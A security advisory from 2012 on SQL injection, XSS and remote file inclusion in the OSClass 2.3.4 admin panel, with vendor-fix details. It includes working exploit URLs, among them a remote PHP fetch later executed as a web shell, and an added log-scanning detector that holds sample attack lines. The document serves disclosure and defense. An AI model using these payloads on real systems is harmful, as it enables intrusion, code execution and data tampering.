Multiple vulnerabilities in OSClass



Advisory ID: CSA-12003
Title: Multiple vulnerabilities in OSClass
Product: OSClass
Version: 2.3.4 and probably prior
Vendor: osclass.org
Vulnerability type: SQL injection, XSS, Remote file inclusion
Vendor notification: 2012-01-12
Public disclosure: 2012-01-27


OSClass version 2.3.4 (and probably earlier versions) suffers from multiple vulnerabilities. All four require an authenticated admin session, so their practical impact is that anyone holding (or having stolen) admin-panel credentials can go on to execute code on the host and read or write the database:


1) Remote file inclusion in osc_downloadFile(). The admin AJAX "upgrade" action passes the user-supplied "file" parameter to osc_downloadFile(), which fetches that URL and stores the result under oc-content/downloads/, inside the web root. An attacker can therefore place an arbitrary file (e.g. a malicious PHP script) on the server and then request it directly, executing shell commands with the privileges of the web server.
An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php

http://127.0.0.1/osclass/oc-content/downloads/tmp.php



2) SQL injection in the admin AJAX interface when performing the "edit_category_post" action. The GET parameter "id" is not sanitized. The payload below relies on a single quote to terminate the string the value is embedded in.
An attacker must be logged in as admin to exploit this vulnerability, and magic_quotes_gpc must be off (otherwise the quote is escaped).

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201



3) SQL injection in the admin AJAX interface when performing the "enable_category" action. The GET parameter "id" is not sanitized.
An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201

(id must be a valid subcategory id; here the injection point is not inside a quoted string, so no quote character is needed to break out and magic_quotes_gpc can be on)



4) Reflected XSS in the admin AJAX interface. The GET parameter "id" of the "enable_category" action is not sanitized and is echoed back in the response without HTML encoding.
An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E

(id must be a valid category id)
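The following detector is an added example, not part of the advisory or of OSClass. It scans combined-format web-server access-log lines for the four request patterns above plus the follow-up request to the dropped script under oc-content/downloads/ (the second stage of issue 1). The log lines embedded in it are constructed; the client IPs, timestamps, and the heuristic that any non-numeric "id" on these two actions is an attack are assumptions made for illustration.

```python
"""Access-log detector for the OSClass 2.3.4 admin AJAX issues in CSA-12003.

Added example, not code from the advisory or from OSClass.  The log lines in
SAMPLE_LOG are constructed; IPs, timestamps and the heuristic "any non-numeric
id on these actions is an attack" are assumptions made for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: we need client IP, timestamp, request URL and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Admin AJAX actions whose "id" parameter the advisory reports as unsanitised
# (SQL injection in both, reflected XSS in enable_category).
CATEGORY_ACTIONS = {"edit_category_post", "enable_category"}

# A PHP file requested from the directory osc_downloadFile() writes to is the
# second stage of issue 1: the dropped script being executed.
DOWNLOADS_PHP_RE = re.compile(r"/oc-content/downloads/[^/]+\.php$", re.I)

# Any URL scheme in the "file" parameter of the upgrade action means
# osc_downloadFile() will fetch a remote resource into the web root.
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify_request(url):
    """Return a list of finding strings for one request URL ([] if clean)."""
    parts = urlsplit(url)
    if DOWNLOADS_PHP_RE.search(parts.path):
        return [f"rce: php executed from downloads dir {parts.path!r}"]
    if not parts.path.endswith("/oc-admin/index.php"):
        return []
    q = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes
    if q.get("page") != ["ajax"]:
        return []
    action = q.get("action", [""])[0]
    findings = []
    if action == "upgrade":
        for f in q.get("file", []):
            if URL_SCHEME_RE.match(f):
                findings.append(f"rfi: upgrade fetching remote file {f!r}")
    if action in CATEGORY_ACTIONS:
        for raw in q.get("id", []):
            if not raw.isdigit():
                # Angle brackets point at the XSS vector; anything else that is
                # not a plain integer is treated as a SQL injection attempt.
                kind = "xss" if re.search(r"[<>]", raw) else "sqli"
                findings.append(f"{kind}: action={action} id={raw!r}")
    return findings


def scan_log(lines):
    """Return (ip, timestamp, status, finding) tuples for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for finding in classify_request(m["url"]):
            hits.append((m["ip"], m["ts"], int(m["status"]), finding))
    return hits


# Constructed sample: the advisory's four requests plus the follow-up hit on the
# dropped script, and two benign admin requests that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jan/2012:10:01:02 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://203.0.113.9/tmp.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jan/2012:10:01:05 +0100] "GET /osclass/oc-content/downloads/tmp.php?cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jan/2012:10:02:11 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jan/2012:10:03:40 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E HTTP/1.1" 200 61 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Jan/2012:10:05:00 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2 HTTP/1.1" 200 61 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Jan/2012:10:05:30 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=upgrade&file=osclass-2.3.5.zip HTTP/1.1" 200 2 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, ts, status, finding in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {status} {finding}")
```

Running the script against the sample flags the four requests from 203.0.113.7 and nothing from 198.51.100.4. Because every request in the advisory is a GET, the parameters are in the request line and an access log is enough; the same actions sent as POST bodies would not be visible there and would need application-level or WAF logging. Since all four actions require an admin session, a hit from a client that does not normally use the admin panel is also a sign that admin credentials or a session have been stolen.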


Solution

Upgrade to OSClass 2.3.5, which the vendor released on 2012-01-16, after notification and before public disclosure:

http://osclass.org/2012/01/16/osclass-2-3-5/



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@xxxxxxxxx


